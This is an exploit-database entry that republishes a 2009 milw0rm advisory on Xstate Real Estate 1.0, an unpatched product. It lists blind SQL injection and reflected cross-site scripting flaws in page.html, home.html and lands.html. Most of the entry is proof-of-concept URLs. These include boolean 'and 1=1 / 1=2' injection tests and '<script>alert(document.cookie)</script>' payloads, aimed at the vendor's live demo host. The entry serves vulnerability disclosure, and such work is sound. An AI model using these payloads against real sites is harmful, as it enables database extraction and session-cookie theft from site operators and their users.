header-logo
Suggest Exploit
vendor:
Xstate Real Estate
by:
Moudi
7,5
CVSS
HIGH
bSQL/XSS
89, 79
CWE
Product Name: Xstate Real Estate
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:xstate:xstate_real_estate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerability

Xstate Real Estate 1.0 is vulnerable to bSQL and XSS. The vulnerable code is present in page.html (pid) and home.html (/), lands.html (/d). The PoC for bSQL is http://127.0.0.1/page.html?pid=[bSQL] and for XSS is http://127.0.0.1/home.html/[XSS] and http://127.0.0.1/lands.html/[XSS]. The demo URL for bSQL is http://demo.xstate.org/page.html?pid=1 and 1=1 TRUE and http://demo.xstate.org/page.html?pid=1 and 1=2 FALSE. The demo URL for XSS is http://demo.xstate.org/home.html/"><script>alert(document.cookie);</script> and http://demo.xstate.org/lands.html/"><script>alert(document.cookie);</script>.

Mitigation:

Input validation and output encoding should be used to prevent bSQL and XSS.
Source

Exploit-DB raw data:

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerability

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.xstate.org

Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php

*/

[+] Exploit bSQL:

- Vulnerable code in page.html (pid).

- Poc:
  http://127.0.0.1/page.html?pid=[bSQL]

  http://demo.xstate.org/page.html?pid=1 and 1=1 TRUE
  http://demo.xstate.org/page.html?pid=1 and 1=2 FALSE

[+] Exploit XSS:

- Vulnerable code in home.html (/).
- Vulnerable code in lands.html (/d).

- Poc:
  http://127.0.0.1/home.html/[XSS]
  http://127.0.0.1/lands.html/[XSS]

  http://demo.xstate.org/home.html/"><script>alert(document.cookie);</script>
  http://demo.xstate.org/lands.html/"><script>alert(document.cookie);</script>

Note: have somes other xss, tired to do all ^^

# milw0rm.com [2009-09-01]